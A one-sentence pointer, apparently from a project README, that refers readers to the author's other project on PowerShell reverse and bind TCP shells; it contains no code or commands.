Find out more about PowerShell reverse and bind TCP shells from my other project.